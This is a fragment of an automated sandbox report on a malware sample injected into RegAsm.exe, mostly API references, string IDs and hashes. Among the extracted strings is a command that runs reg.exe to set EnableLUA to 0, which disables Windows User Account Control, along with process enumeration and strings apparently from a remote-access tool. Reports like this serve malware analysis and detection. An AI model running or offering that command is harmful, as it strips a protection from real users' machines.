                                                                                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                          • API String ID: 2922976086-4183131282
                                                                                                                                                                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                                                                                          • Rmc-UP4CTA, xrefs: 00407715
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-UP4CTA
                                                                                                                                                                                          • API String ID: 0-3511099120
                                                                                                                                                                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                          • String ID: KeepAlive | Disabled
                                                                                                                                                                                          • API String ID: 2993684571-305739064
                                                                                                                                                                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                          • String ID: Alarm triggered
                                                                                                                                                                                          • API String ID: 614609389-2816303416
                                                                                                                                                                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                          • API String ID: 3024135584-2418719853
                                                                                                                                                                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID: SETTINGS
                                                                                                                                                                                          • API String ID: 3473537107-594951305
                                                                                                                                                                                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                                                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1286116820-0
                                                                                                                                                                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                                                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2180151492-0
                                                                                                                                                                                          • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                                                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                                                                          • __freea.LIBCMT ref: 0045129D
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                          • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                                                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                                                          • _free.LIBCMT ref: 0044F43F
                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                                          • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                                                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                                          • _free.LIBCMT ref: 00448353
                                                                                                                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                          • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2951400881-0
                                                                                                                                                                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 00450A54
